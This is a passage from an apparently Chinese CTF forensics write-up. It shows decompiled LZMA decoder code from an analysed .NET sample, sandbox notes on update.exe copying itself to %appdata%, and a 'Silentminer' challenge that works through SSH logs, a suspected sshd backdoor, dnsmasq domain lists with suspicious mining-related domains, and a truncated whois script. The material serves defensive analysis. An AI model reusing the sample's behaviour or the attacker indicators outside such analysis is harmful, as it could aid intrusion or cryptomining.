  internal uint Range;


  // Token: 0x04000008 RID: 8
  internal Stream Stream;
 }


 // Token: 0x02000006 RID: 6
 private class LzmaDecoder
 {
  // Token: 0x06000012 RID: 18 RVA: 0x0000927C File Offset: 0x0000747C
  internal LzmaDecoder()
  {
   this.m_DictionarySize = uint.MaxValue;
   int num = 0;
   while ((long)num < 4L)
   {
    this.m_PosSlotDecoder[num] = new <Module>.BitTreeDecoder(6);
    num++;
   }
  }


  // Token: 0x06000013 RID: 19 RVA: 0x00009374 File Offset: 0x00007574
  private void SetDictionarySize(uint A_1)
  {
   if (this.m_DictionarySize != A_1)
   {
    this.m_DictionarySize = A_1;
    this.m_DictionarySizeCheck = Math.Max(this.m_DictionarySize, 1U);
    uint num = Math.Max(this.m_DictionarySizeCheck, 4096U);
    this.m_OutWindow.Create(num);
   }
  }


  // Token: 0x06000014 RID: 20 RVA: 0x000088E4 File Offset: 0x00006AE4
  private void SetLiteralProperties(int A_1, int A_2)
  {
   this.m_LiteralDecoder.Create(A_1, A_2);
  }


  // Token: 0x06000015 RID: 21 RVA: 0x000093C0 File Offset: 0x000075C0
  private void SetPosBitsProperties(int A_1)
  {
   uint num = 1U << A_1;
   this.m_LenDecoder.Create(num);
   this.m_RepLenDecoder.Create(num);
   this.m_PosStateMask = num - 1U;
  }


  // Token: 0x06000016 RID: 22 RVA: 0x000093F8 File Offset: 0x000075F8
  private void Init(Stream A_1, Stream A_2)
  {
   this.m_RangeDecoder.Init(A_1);
   this.m_OutWindow.Init(A_2, this._solid);
   for (uint num = 0U; num < 12U; num += 1U)
   {
    for (uint num2 = 0U; num2 <= this.m_PosStateMask; num2 += 1U)
    {
     uint num3 = (num << 4) + num2;
     this.m_IsMatchDecoders[(int)((UIntPtr)num3)].Init();
     this.m_IsRep0LongDecoders[(int)((UIntPtr)num3)].Init();
    }
    this.m_IsRepDecoders[(int)((UIntPtr)num)].Init();
    this.m_IsRepG0Decoders[(int)((UIntPtr)num)].Init();
    this.m_IsRepG1Decoders[(int)((UIntPtr)num)].Init();
    this.m_IsRepG2Decoders[(int)((UIntPtr)num)].Init();
   }
   this.m_LiteralDecoder.Init();
   for (uint num = 0U; num < 4U; num += 1U)
   {
    this.m_PosSlotDecoder[(int)((UIntPtr)num)].Init();
   }
   for (uint num = 0U; num < 114U; num += 1U)
   {
    this.m_PosDecoders[(int)((UIntPtr)num)].Init();
   }
   this.m_LenDecoder.Init();
   this.m_RepLenDecoder.Init();
   this.m_PosAlignDecoder.Init();
  }


  // Token: 0x06000017 RID: 23 RVA: 0x00009524 File Offset: 0x00007724
  internal void Code(Stream A_1, Stream A_2, long A_3, long A_4)
  {
   this.Init(A_1, A_2);
   <Module>.State state = default(<Module>.State);
   state.Init();
   uint num = 0U;
   uint num2 = 0U;
   uint num3 = 0U;
   uint num4 = 0U;
   ulong num5 = 0UL;
   if (num5 < (ulong)A_4)
   {
    this.m_IsMatchDecoders[(int)((UIntPtr)(state.Index << 4))].Decode(this.m_RangeDecoder);
    state.UpdateChar();
    byte b = this.m_LiteralDecoder.DecodeNormal(this.m_RangeDecoder, 0U, 0);
    this.m_OutWindow.PutByte(b);
    num5 += 1UL;
   }
   while (num5 < (ulong)A_4)
   {
    uint num6 = (uint)num5 & this.m_PosStateMask;
    if (this.m_IsMatchDecoders[(int)((UIntPtr)((state.Index << 4) + num6))].Decode(this.m_RangeDecoder) == 0U)
    {
     byte @byte = this.m_OutWindow.GetByte(0U);
     byte b2;
     if (!state.IsCharState())
     {
      b2 = this.m_LiteralDecoder.DecodeWithMatchByte(this.m_RangeDecoder, (uint)num5, @byte, this.m_OutWindow.GetByte(num));
     }
     else
     {
      b2 = this.m_LiteralDecoder.DecodeNormal(this.m_RangeDecoder, (uint)num5, @byte);
     }
     this.m_OutWindow.PutByte(b2);
     state.UpdateChar();
     num5 += 1UL;
    }
    else
    {
     uint num8;
     if (this.m_IsRepDecoders[(int)((UIntPtr)state.Index)].Decode(this.m_RangeDecoder) == 1U)
     {
      if (this.m_IsRepG0Decoders[(int)((UIntPtr)state.Index)].Decode(this.m_RangeDecoder) == 0U)
      {
       if (this.m_IsRep0LongDecoders[(int)((UIntPtr)((state.Index << 4) + num6))].Decode(this.m_RangeDecoder) == 0U)
       {
        state.UpdateShortRep();
        this.m_OutWindow.PutByte(this.m_OutWindow.GetByte(num));
        num5 += 1UL;
        continue;
       }
      }
      else
      {
       uint num7;
       if (this.m_IsRepG1Decoders[(int)((UIntPtr)state.Index)].Decode(this.m_RangeDecoder) == 0U)
       {
        num7 = num2;
       }
       else
       {
        if (this.m_IsRepG2Decoders[(int)((UIntPtr)state.Index)].Decode(this.m_RangeDecoder) == 0U)
        {
         num7 = num3;
        }
        else
        {
         num7 = num4;
         num4 = num3;
        }
        num3 = num2;
       }
       num2 = num;
       num = num7;
      }
      num8 = this.m_RepLenDecoder.Decode(this.m_RangeDecoder, num6) + 2U;
      state.UpdateRep();
     }
     else
     {
      num4 = num3;
      num3 = num2;
      num2 = num;
      num8 = 2U + this.m_LenDecoder.Decode(this.m_RangeDecoder, num6);
      state.UpdateMatch();
      uint num9 = this.m_PosSlotDecoder[(int)((UIntPtr)<Module>.LzmaDecoder.GetLenToPosState(num8))].Decode(this.m_RangeDecoder);
      if (num9 >= 4U)
      {
       int num10 = (int)((num9 >> 1) - 1U);
       num = (2U | (num9 & 1U)) << num10;
       if (num9 < 14U)
       {
        num += <Module>.BitTreeDecoder.ReverseDecode(this.m_PosDecoders, num - num9 - 1U, this.m_RangeDecoder, num10);
       }
       else
       {
        num += this.m_RangeDecoder.DecodeDirectBits(num10 - 4) << 4;
        num += this.m_PosAlignDecoder.ReverseDecode(this.m_RangeDecoder);
       }
      }
      else
      {
       num = num9;
      }
     }
     if (((ulong)num >= num5 || num >= this.m_DictionarySizeCheck) && num == 4294967295U)
     {
      break;
     }
     this.m_OutWindow.CopyBlock(num, num8);
     num5 += (ulong)num8;
    }
   }
   this.m_OutWindow.Flush();
   this.m_OutWindow.ReleaseStream();
   this.m_RangeDecoder.ReleaseStream();
  }


  // Token: 0x06000018 RID: 24 RVA: 0x00009874 File Offset: 0x00007A74
  internal void SetDecoderProperties(byte[] A_1)
  {
   int num = (int)(A_1[0] % 9);
   int num2 = (int)(A_1[0] / 9);
   int num3 = num2 % 5;
   int posBitsProperties = num2 / 5;
   uint num4 = 0U;
   for (int i = 0; i < 4; i++)
   {
    num4 += (uint)((uint)A_1[1 + i] << i * 8);
   }
   this.SetDictionarySize(num4);
   this.SetLiteralProperties(num3, num);
   this.SetPosBitsProperties(posBitsProperties);
  }


  // Token: 0x06000019 RID: 25 RVA: 0x000088F3 File Offset: 0x00006AF3
  private static uint GetLenToPosState(uint A_0)
  {
   A_0 -= 2U;
   if (A_0 < 4U)
   {
    return A_0;
   }
   return 3U;
  }


  // Token: 0x04000009 RID: 9
  private readonly <Module>.BitDecoder[] m_IsMatchDecoders = new <Module>.BitDecoder[192];


  // Token: 0x0400000A RID: 10
  private readonly <Module>.BitDecoder[] m_IsRep0LongDecoders = new <Module>.BitDecoder[192];


  // Token: 0x0400000B RID: 11
  private readonly <Module>.BitDecoder[] m_IsRepDecoders = new <Module>.BitDecoder[12];


  // Token: 0x0400000C RID: 12
  private readonly <Module>.BitDecoder[] m_IsRepG0Decoders = new <Module>.BitDecoder[12];


  // Token: 0x0400000D RID: 13
  private readonly <Module>.BitDecoder[] m_IsRepG1Decoders = new <Module>.BitDecoder[12];


  // Token: 0x0400000E RID: 14
  private readonly <Module>.BitDecoder[] m_IsRepG2Decoders = new <Module>.BitDecoder[12];


  // Token: 0x0400000F RID: 15
  private readonly <Module>.LzmaDecoder.LenDecoder m_LenDecoder = new <Module>.LzmaDecoder.LenDecoder();


  // Token: 0x04000010 RID: 16
  private readonly <Module>.LzmaDecoder.LiteralDecoder m_LiteralDecoder = new <Module>.LzmaDecoder.LiteralDecoder();


  // Token: 0x04000011 RID: 17
  private readonly <Module>.OutWindow m_OutWindow = new <Module>.OutWindow();


  // Token: 0x04000012 RID: 18
  private readonly <Module>.BitDecoder[] m_PosDecoders = new <Module>.BitDecoder[114];


  // Token: 0x04000013 RID: 19
  private readonly <Module>.BitTreeDecoder[] m_PosSlotDecoder = new <Module>.BitTreeDecoder[4];


  // Token: 0x04000014 RID: 20
  private readonly <Module>.Decoder m_RangeDecoder = new <Module>.Decoder();


  // Token: 0x04000015 RID: 21
  private readonly <Module>.LzmaDecoder.LenDecoder m_RepLenDecoder = new <Module>.LzmaDecoder.LenDecoder();


  // Token: 0x04000016 RID: 22
  private bool _solid;


  // Token: 0x04000017 RID: 23
  private uint m_DictionarySize;


  // Token: 0x04000018 RID: 24
  private uint m_DictionarySizeCheck;


  // Token: 0x04000019 RID: 25
  private <Module>.BitTreeDecoder m_PosAlignDecoder = new <Module>.BitTreeDecoder(4);


  // Token: 0x0400001A RID: 26
  private uint m_PosStateMask;


  // Token: 0x02000007 RID: 7
  private class LenDecoder
  {
   // Token: 0x0600001A RID: 26 RVA: 0x000098D4 File Offset: 0x00007AD4
   internal void Create(uint A_1)
   {
    for (uint num = this.m_NumPosStates; num < A_1; num += 1U)
    {
     this.m_LowCoder[(int)((UIntPtr)num)] = new <Module>.BitTreeDecoder(3);
     this.m_MidCoder[(int)((UIntPtr)num)] = new <Module>.BitTreeDecoder(3);
    }
    this.m_NumPosStates = A_1;
   }


   // Token: 0x0600001B RID: 27 RVA: 0x0000992C File Offset: 0x00007B2C
   internal void Init()
   {
    this.m_Choice.Init();
    for (uint num = 0U; num < this.m_NumPosStates; num += 1U)
    {
     this.m_LowCoder[(int)((UIntPtr)num)].Init();
     this.m_MidCoder[(int)((UIntPtr)num)].Init();
    }
    this.m_Choice2.Init();
    this.m_HighCoder.Init();
   }


   // Token: 0x0600001C RID: 28 RVA: 0x00009990 File Offset: 0x00007B90
   internal uint Decode(<Module>.Decoder A_1, uint A_2)
   {
    if (this.m_Choice.Decode(A_1) == 0U)
    {
     return this.m_LowCoder[(int)((UIntPtr)A_2)].Decode(A_1);
    }
    uint num = 8U;
    if (this.m_Choice2.Decode(A_1) == 0U)
    {
     num += this.m_MidCoder[(int)((UIntPtr)A_2)].Decode(A_1);
    }
    else
    {
     num += 8U;
     num += this.m_HighCoder.Decode(A_1);
    }
    return num;
   }


   // Token: 0x0600001D RID: 29 RVA: 0x000099FC File Offset: 0x00007BFC
   internal LenDecoder()
   {
   }


   // Token: 0x0400001B RID: 27
   private readonly <Module>.BitTreeDecoder[] m_LowCoder = new <Module>.BitTreeDecoder[16];


   // Token: 0x0400001C RID: 28
   private readonly <Module>.BitTreeDecoder[] m_MidCoder = new <Module>.BitTreeDecoder[16];


   // Token: 0x0400001D RID: 29
   private <Module>.BitDecoder m_Choice = default(<Module>.BitDecoder);


   // Token: 0x0400001E RID: 30
   private <Module>.BitDecoder m_Choice2 = default(<Module>.BitDecoder);


   // Token: 0x0400001F RID: 31
   private <Module>.BitTreeDecoder m_HighCoder = new <Module>.BitTreeDecoder(8);


   // Token: 0x04000020 RID: 32
   private uint m_NumPosStates;
  }


  // Token: 0x02000008 RID: 8
  private class LiteralDecoder
  {
   // Token: 0x0600001E RID: 30 RVA: 0x00009A50 File Offset: 0x00007C50
   internal void Create(int A_1, int A_2)
   {
    if (this.m_Coders != null && this.m_NumPrevBits == A_2 && this.m_NumPosBits == A_1)
    {
     return;
    }
    this.m_NumPosBits = A_1;
    this.m_PosMask = (1U << A_1) - 1U;
    this.m_NumPrevBits = A_2;
    uint num = 1U << this.m_NumPrevBits + this.m_NumPosBits;
    this.m_Coders = new <Module>.LzmaDecoder.LiteralDecoder.Decoder2[num];
    for (uint num2 = 0U; num2 < num; num2 += 1U)
    {
     this.m_Coders[(int)((UIntPtr)num2)].Create();
    }
   }


   // Token: 0x0600001F RID: 31 RVA: 0x00009AD4 File Offset: 0x00007CD4
   internal void Init()
   {
    uint num = 1U << this.m_NumPrevBits + this.m_NumPosBits;
    for (uint num2 = 0U; num2 < num; num2 += 1U)
    {
     this.m_Coders[(int)((UIntPtr)num2)].Init();
    }
   }


   // Token: 0x06000020 RID: 32 RVA: 0x00008901 File Offset: 0x00006B01
   private uint GetState(uint A_1, byte A_2)
   {
    return ((A_1 & this.m_PosMask) << this.m_NumPrevBits) + (uint)(A_2 >> 8 - this.m_NumPrevBits);
   }


   // Token: 0x06000021 RID: 33 RVA: 0x00008923 File Offset: 0x00006B23
   internal byte DecodeNormal(<Module>.Decoder A_1, uint A_2, byte A_3)
   {
    return this.m_Coders[(int)((UIntPtr)this.GetState(A_2, A_3))].DecodeNormal(A_1);
   }


   // Token: 0x06000022 RID: 34 RVA: 0x0000893F File Offset: 0x00006B3F
   internal byte DecodeWithMatchByte(<Module>.Decoder A_1, uint A_2, byte A_3, byte A_4)
   {
    return this.m_Coders[(int)((UIntPtr)this.GetState(A_2, A_3))].DecodeWithMatchByte(A_1, A_4);
   }


   // Token: 0x06000023 RID: 35 RVA: 0x000088DC File Offset: 0x00006ADC
   internal LiteralDecoder()
   {
   }


   // Token: 0x04000021 RID: 33
   private <Module>.LzmaDecoder.LiteralDecoder.Decoder2[] m_Coders;


   // Token: 0x04000022 RID: 34
   private int m_NumPosBits;


   // Token: 0x04000023 RID: 35
   private int m_NumPrevBits;


   // Token: 0x04000024 RID: 36
   private uint m_PosMask;


   // Token: 0x02000009 RID: 9
   private struct Decoder2
   {
    // Token: 0x06000024 RID: 36 RVA: 0x0000895D File Offset: 0x00006B5D
    internal void Create()
    {
     this.m_Decoders = new <Module>.BitDecoder[768];
    }


    // Token: 0x06000025 RID: 37 RVA: 0x00009B14 File Offset: 0x00007D14
    internal void Init()
    {
     for (int i = 0; i < 768; i++)
     {
      this.m_Decoders[i].Init();
     }
    }


    // Token: 0x06000026 RID: 38 RVA: 0x00009B44 File Offset: 0x00007D44
    internal byte DecodeNormal(<Module>.Decoder A_1)
    {
     uint num = 1U;
     do
     {
      num = (num << 1 | this.m_Decoders[(int)((UIntPtr)num)].Decode(A_1));
     }
     while (num < 256U);
     return (byte)num;
    }


    // Token: 0x06000027 RID: 39 RVA: 0x00009B78 File Offset: 0x00007D78
    internal byte DecodeWithMatchByte(<Module>.Decoder A_1, byte A_2)
    {
     uint num = 1U;
     for (;;)
     {
      uint num2 = (uint)(A_2 >> 7 & 1);
      A_2 = (byte)(A_2 << 1);
      uint num3 = this.m_Decoders[(int)((UIntPtr)((1U + num2 << 8) + num))].Decode(A_1);
      num = (num << 1 | num3);
      if (num2 != num3)
      {
       break;
      }
      if (num >= 256U)
      {
       goto IL_5E;
      }
     }
     while (num < 256U)
     {
      num = (num << 1 | this.m_Decoders[(int)((UIntPtr)num)].Decode(A_1));
     }
     IL_5E:
     return (byte)num;
    }


    // Token: 0x04000025 RID: 37
    private <Module>.BitDecoder[] m_Decoders;
   }
  }
 }


 // Token: 0x0200000A RID: 10
 private class OutWindow
 {
  // Token: 0x06000028 RID: 40 RVA: 0x0000896F File Offset: 0x00006B6F
  internal void Create(uint A_1)
  {
   if (this._windowSize != A_1)
   {
    this._buffer = new byte[A_1];
   }
   this._windowSize = A_1;
   this._pos = 0U;
   this._streamPos = 0U;
  }


  // Token: 0x06000029 RID: 41 RVA: 0x0000899C File Offset: 0x00006B9C
  internal void Init(Stream A_1, bool A_2)
  {
   this.ReleaseStream();
   this._stream = A_1;
   if (!A_2)
   {
    this._streamPos = 0U;
    this._pos = 0U;
   }
  }


  // Token: 0x0600002A RID: 42 RVA: 0x000089BC File Offset: 0x00006BBC
  internal void ReleaseStream()
  {
   this.Flush();
   this._stream = null;
   Buffer.BlockCopy(new byte[this._buffer.Length], 0, this._buffer, 0, this._buffer.Length);
  }


  // Token: 0x0600002B RID: 43 RVA: 0x00009BE8 File Offset: 0x00007DE8
  internal void Flush()
  {
   uint num = this._pos - this._streamPos;
   if (num == 0U)
   {
    return;
   }
   this._stream.Write(this._buffer, (int)this._streamPos, (int)num);
   if (this._pos >= this._windowSize)
   {
    this._pos = 0U;
   }
   this._streamPos = this._pos;
  }


  // Token: 0x0600002C RID: 44 RVA: 0x00009C40 File Offset: 0x00007E40
  internal void CopyBlock(uint A_1, uint A_2)
  {
   uint num = this._pos - A_1 - 1U;
   if (num >= this._windowSize)
   {
    num += this._windowSize;
   }
   while (A_2 > 0U)
   {
    if (num >= this._windowSize)
    {
     num = 0U;
    }
    this._buffer[(int)((UIntPtr)(this._pos++))] = this._buffer[(int)((UIntPtr)(num++))];
    if (this._pos >= this._windowSize)
    {
     this.Flush();
    }
    A_2 -= 1U;
   }
  }


  // Token: 0x0600002D RID: 45 RVA: 0x00009CBC File Offset: 0x00007EBC
  internal void PutByte(byte A_1)
  {
   this._buffer[(int)((UIntPtr)(this._pos++))] = A_1;
   if (this._pos >= this._windowSize)
   {
    this.Flush();
   }
  }


  // Token: 0x0600002E RID: 46 RVA: 0x00009CF8 File Offset: 0x00007EF8
  internal byte GetByte(uint A_1)
  {
   uint num = this._pos - A_1 - 1U;
   if (num >= this._windowSize)
   {
    num += this._windowSize;
   }
   return this._buffer[(int)((UIntPtr)num)];
  }


  // Token: 0x0600002F RID: 47 RVA: 0x000088DC File Offset: 0x00006ADC
  internal OutWindow()
  {
  }


  // Token: 0x04000026 RID: 38
  private byte[] _buffer;


  // Token: 0x04000027 RID: 39
  private uint _pos;


  // Token: 0x04000028 RID: 40
  private Stream _stream;


  // Token: 0x04000029 RID: 41
  private uint _streamPos;


  // Token: 0x0400002A RID: 42
  private uint _windowSize;
 }


 // Token: 0x0200000B RID: 11
 private struct State
 {
  // Token: 0x06000030 RID: 48 RVA: 0x000089ED File Offset: 0x00006BED
  internal void Init()
  {
   this.Index = 0U;
  }


  // Token: 0x06000031 RID: 49 RVA: 0x000089F6 File Offset: 0x00006BF6
  internal void UpdateChar()
  {
   if (this.Index < 4U)
   {
    this.Index = 0U;
    return;
   }
   if (this.Index < 10U)
   {
    this.Index -= 3U;
    return;
   }
   this.Index -= 6U;
  }


  // Token: 0x06000032 RID: 50 RVA: 0x00008A30 File Offset: 0x00006C30
  internal void UpdateMatch()
  {
   this.Index = ((this.Index < 7U) ? 7U : 10U);
  }


  // Token: 0x06000033 RID: 51 RVA: 0x00008A46 File Offset: 0x00006C46
  internal void UpdateRep()
  {
   this.Index = ((this.Index < 7U) ? 8U : 11U);
  }


  // Token: 0x06000034 RID: 52 RVA: 0x00008A5C File Offset: 0x00006C5C
  internal void UpdateShortRep()
  {
   this.Index = ((this.Index < 7U) ? 9U : 11U);
  }


  // Token: 0x06000035 RID: 53 RVA: 0x00008A73 File Offset: 0x00006C73
  internal bool IsCharState()
  {
   return this.Index < 7U;
  }


  // Token: 0x0400002B RID: 43
  internal uint Index;
 }
}

再上一次沙箱,这次用 update.exe

https://sandbox.ti.qianxin.com/sandbox/page/detail?id=f824677aa030d11ef52d9f5789eac4e275cd0091&type=file

发现了释放了update452tmp.exe到 %appdata%

再把这个拿出来上沙箱,好像没区别了,应该就是把自己复制一份放过去

那重点应该还是在 update.exe 上面

没招了

Silentminer#

铛,铛,铛,洞穴里传来铁镐敲击石头的声音。 回答以下问题,每个问题都是一个单独的flag:

  1. 攻击者的ip地址
  2. 攻击者共进行多少次ssh口令爆破失败?
  3. 后门文件路径的绝对路径
  4. 攻击者用户分发恶意文件的域名(注意系统时区)
  5. 挖矿病毒所属的家族(全小写)

SSH 日志能看到第一题的 IP,同时能查到第二题的数量

Aug 10 10:00:14 lee-virtual-machine sshd[83820]: Accepted password for lee from 192.168.145.131 port 37864 ssh2

修改了多次sshd文件,推测后门可能放在sshd service里面

从/var/log/dnsmasq.log中提取dns记录和域名

1341512.sched.sma.tdnsstic1.cn
488928.sched.skalego-dk.tdnsstic1.cn
5015c0hc.sched.sma-dk.tdnsstic1.cn
872923.sched.sma-dk.tdnsstic1.cn
8n0p1hpu.sched.sma-dk.tdnsstic1.cn
a-0001.a-msedge.net
a.sinaimg.cn
api.cupid.dns.iqiyi.com
apigw-v6-data.video.iqiyi.com
apigw-v6.iqiyi.com
asinaimg.gslb.sinaedge.com
aus5.mozilla.org
ax.ifeng.com
baidu.com
balrog-aus5.r53-2.services.mozilla.com
bd-l7-online-tob-default-ipv6.s.bdsa.cdnbuild.net
best.sched.skalego-dk.tdnsstic1.cn
best.sched.sma.tdnsstic1.cn
bfdmirrors.s.tuna.tsinghua.edu.cn
big1.ifengcdn.com
c0.ifengimg.com
c0.ifengimg.com.cdn.dnsv1.com
c206825.edgekey.net
cac-ocsp.digicert.com.edgekey.net
cb.e.shifen.com
cdn.globalsigncdn.com.cdn.cloudflare.net
changelogs.ubuntu.com
cm.adxvip.com
cm.fastapi.net
cn-bing-com.cn.a-0001.a-msedge.net
cn.bing.com
connectivity-check.ubuntu.com
console.zhibo.ifeng.com
content-signature-2.cdn.mozilla.net
content-signature-chains.prod.autograph.services.mozaws.net
contile.services.mozilla.com
cook.iqiyi.com
cpro.baidustatic.com
cpro.baidustatic.com.a.bdydns.com
cs3.ifengcdn.com
cstaticdun.126.net
cstaticdun.126.net.163jiasu.com
cstaticdun.126.net.db8bff76.c.cdnhwc1.com
d.ifengimg.com
d.ifengimg.com.cdn.dnsv1.com
d.sinaimg.cn
daisy.ubuntu.com
data.video.dns.iqiyi.com
data.video.iqiyi.com
datahub.zhihu.com
detectportal.firefox.com
detectportal.prod.mozaws.net
dfp-business.iqiyi.com
dmae5mr9.sched.sma.tdnsstic1.cn
dsinaimg.gslb.sinaedge.com
dsp.djc888.cn
e206825.dsca.akamaiedge.net
e3913.cd.akamaiedge.net
e9qw5a14.sched.sma.tdnsstic1.cn
eclick.baidu.com
eclick.e.shifen.com
err.ifengcloud.ifeng.com
example.org
f.video.weibocdn.com
f10.baidu.com
f10.baidu.com.a.bdydns.com
fc4tn.baidu.com
fc4tn.baidu.com.a.bdydns.com
firefox.settings.services.mozilla.com
fvideo.gslb.sinaedge.com
fzv05913.sched.sma-dk.tdnsstic1.cn
google.com
h5.sinaimg.cn
h5sinaimg.gslb.sinaedge.com
hcdnw101.vip.cdnhwcbzj102.com
hm.baidu.com
hm.e.shifen.com
i.sso.sina.com.cn
img.cdn.iqiyi.com
img.ifeng.com
img.ifeng.com.cdn.dnsv1.com
incoming.telemetry.mozilla.org
iphuph98.sched.sma-dk.tdnsstic1.cn
ipv4only.arpa
ipv6-static.dns.iqiyi.com
kln.grid.sinaedge.com
lb-7pyifl1r-vkwri1j49sb230hx.clb.ap-beijing.tencentclb.com
lb-7szg5pyd-8jgvnzhtb0d4qciw.clb.ap-beijing.tencentclb.com
lb-tsn01-offline.zhihu.com
login.sina.com.cn
lupic.cdn.bcebos.com
lupic.cdn.bcebos.com.a.bdydns.com
m.iqiyipic.com
mesh.if.iqiyi.com
mirrors.tuna.tsinghua.edu.cn
msg.qy.net
msg.video.dns.iqiyi.com
o.pki.goog
ocsp.comodoca.com.cdn.cloudflare.net
ocsp.dcocsp.cn
ocsp.dcocsp.cn.w.kunlunar.com
ocsp.digicert.cn
ocsp.digicert.cn.w.cdngslb.com
ocsp.digicert.com
ocsp.edge.digicert.com
ocsp.globalsign.com
ocsp.sectigo.com
ocsp.sectigochina.com
ocsp.sectigochina.com.cdn.cloudflare.net
ocsp.trust-provider.cn
ocsp.trust-provider.cn.c.vedcdnlb.com
opencdnbdfctn.jomodns.com
opencdnbdsimage.jomodns.com
opencdnbdv6.f24i25ec.hzyidc.com
opencdnbdv6.jomodns.com
opencdnbdwm2.jomodns.com
opencdnh3.jomodns.com
opencdniqiyistaticv6.jomodns.com
opencdnsslv6.jomodns.com
opencdnzhihustatic.jomodns.com
p0.ifengimg.com
p0.ifengimg.com.cdn.dnsv1.com
p1.ifengimg.com
p1.ifengimg.com.cdn.dnsv1.com
passport.weibo.com
pdb.5hte21mz.com
pic.cdn.iqiyi.com
pic0.iqiyipic.com
pic1.iqiyipic.com
pic2.iqiyipic.com
pic2.zhimg.com
pic2.zhimg.com.a.bdydns.com
pic3.iqiyipic.com
pic3.zhimg.com
pic3.zhimg.com.a.bdydns.com
pic4.iqiyipic.com
pic5.iqiyipic.com
pic6.iqiyipic.com
pic7.iqiyipic.com
pic8.iqiyipic.com
pic9.iqiyipic.com
pica.zhimg.com
pica.zhimg.com.a.bdydns.com
picx.zhimg.com
picx.zhimg.com.bytexns.com
picx.zhimg.com.volcgslb.com
pki-goog.l.google.com
pos.baidu.com
prod.balrog.prod.cloudops.mozgcp.net
prod.detectportal.prod.cloudops.mozgcp.net
prod.remote-settings.prod.webservices.mozgcp.net
prod.sumo.prod.webservices.mozgcp.net
push.services.mozilla.com
region.ifeng.com
render-server.cdn.bcebos.com
render-server.cdn.bcebos.com.a.bdydns.com
resolv.conf
revive.outin.cn
s.adxvip.com
s.cpro.baidu.com
s.cpro.e.shifen.com
safebrowsing.googleapis.com
security.iqiyi.com
services.addons.mozilla.org
shankapi.ifeng.com
shankapi.ifeng.com.cdn.dnsv1.com
simg.s.weibo.com
simgs.gslb.sinaedge.com
slb-01-rb-ipv6.ctripgslb.com
slb-01-xy-rb-ali-ctrip1.ctripgslb.com
slb-01-xy-rb-ali.ctripgslb.com
slb-rb-cnc-ipv6-01.ctripgslb.com
spool.grid.sinaedge.com
stadig.ifeng.com
static-d.iqiyi.com
static-s.iqiyi.com
static-sd.cdn.iqiyi.com
static.cdn.iqiyi.com
static.geetest.com
static.geetest.com.eo.dnse2.com
static.iqiyi.com
static.outin.cn
static.outin.cn.w.kunlunaq.com
static.zhihu.com
static.zhihu.com.cdn.dnsv1.com
status.geotrust.com
stc.iqiyipic.com
support.mozilla.org
sx-region-all.volcgtm.com
t7z.cupid.iqiyi.com
telemetry-incoming.r53-2.services.mozilla.com
tombaky.com
tvax1.sinaimg.cn
tvax2.sinaimg.cn
tvax3.sinaimg.cn
tvax4.sinaimg.cn
tvaxweibo.grid.sinaedge.com
tvaxweibo.gslb.sinaedge.com
unpkg.zhimg.com
unpkg.zhimg.com.w.kunlunar.com
us-west1.prod.sumo.prod.webservices.mozgcp.net
us.grid.sinaedge.com
v6-data.video.dns.iqiyi.com
weibo.com
weiboimgwx.grid.sinaedge.com
weiboimgwx.gslb.sinaedge.com
wn.pos.baidu.com
wn.pos.e.shifen.com
ww1.sinaimg.cn.w.alikunlun.com
www.a.shifen.com
www.baidu.com
www.ctrip.com
www.ifeng.com
www.ifeng.com.cdn.dnsv1.com
www.iqiyi.com
www.wshifen.com
www.zhihu.com
www.zhihu.com.eo.dnse0.com
wx1.sinaimg.cn
wx3.sinaimg.cn
wx4.sinaimg.cn
x0.ifengimg.com
x0.ifengimg.com.cdn.dnsv1.com
x2.ifengimg.com
x2.ifengimg.com.cdn.dnsv1.com
y0.ifengimg.com
y0.ifengimg.com.cdn.dnsv1.com
y1.ifengimg.com
y1.ifengimg.com.cdn.dnsv1.com
zerossl.ocsp.sectigo.com
zhihu-web-analytics.zhihu.com
zhihu-web-analytics.zhihu.com.eo.dnse0.com

从中筛选可疑域名

选取根域名查询whois

tdnsstic1.cn
a-msedge.net
sinaimg.cn
iqiyi.com
sinaedge.com
mozilla.org
ifeng.com
baidu.com
mozilla.com
cdnbuild.net
edu.cn
ifengcdn.com
ifengimg.com
dnsv1.com
edgekey.net
shifen.com
cloudflare.net
ubuntu.com
adxvip.com
fastapi.net
bing.com
mozilla.net
mozaws.net
baidustatic.com
bdydns.com
126.net
163jiasu.com
cdnhwc1.com
zhihu.com
firefox.com
djc888.cn
akamaiedge.net
example.org
weibocdn.com
google.com
cdnhwcbzj102.com
com.cn
ipv4only.arpa
tencentclb.com
bcebos.com
iqiyipic.com
qy.net
pki.goog
dcocsp.cn
kunlunar.com
digicert.cn
cdngslb.com
digicert.com
globalsign.com
sectigo.com
sectigochina.com
trust-provider.cn
vedcdnlb.com
jomodns.com
hzyidc.com
weibo.com
5hte21mz.com
zhimg.com
bytexns.com
volcgslb.com
mozgcp.net
resolv.conf
outin.cn
googleapis.com
ctripgslb.com
geetest.com
dnse2.com
kunlunaq.com
geotrust.com
volcgtm.com
tombaky.com
alikunlun.com
ctrip.com
wshifen.com
dnse0.com
dnse0.com

题目说注意时区,这个机子用的是 America/Los_Angeles

让ai写一个脚本

#!/bin/bash


# 定义要查询的域名列表
DOMAINS=(
    tdnsstic1.cn
    a-msedge.net
    sinaimg.cn
    iqiyi.com
    sinaedge.com
    mozilla.org
    ifeng.com
    baidu.com
    mozilla.com
    cdnbuild.net
    edu.cn
    ifengcdn.com
    ifengimg.com
    dnsv1.com
    edgekey.net
    shifen.com
    cloudflare.net
    ubuntu.com
    adxvip.com
    fastapi.net
    bing.com
    mozilla.net
    mozaws.net
    baidustatic.com
    bdydns.com
    126.net
    163jiasu.com
    cdnhwc1.com
    zhihu.com
    firefox.com
    djc888.cn
    akamaiedge.net
    example.org
    weibocdn.com
    google.com
    cdnhwcbzj102.com
    com.cn
    ipv4only.arpa
    tencentclb.com
    bcebos.com
    iqiyipic.com
    qy.net
    pki.goog
    dcocsp.cn
    kunlunar.com
    digicert.cn
    cdngslb.com
    digicert.com
    globalsign.com
    sectigo.com
    sectigochina.com
    trust-provider.cn
    vedcdnlb.com
    jomodns.com
    hzyidc.com
    weibo.com
    5hte21mz.com
    zhimg.com
    bytexns.com
    volcgslb.com
    mozgcp.net
    resolv.conf
    outin.cn
    googleapis.com
    ctripgslb.com
    geetest.com
    dnse2.com
    kunlunaq.com
    geotrust.com
    volcgtm.com
    tombaky.com
    alikunlun.com
    ctrip.com
    wshifen.com
    dnse0.com
)


# 循环遍历域名列表
for domain in "${DOMAINS[@]}"; do
    echo "========================================"
    echo "查询域名: $domain"
    echo "----------------------------------------"


    # 执行 whois 命令并将输出存储在变量中
    # 对 .cn 域名使用特定的服务器以获得更准确的格式
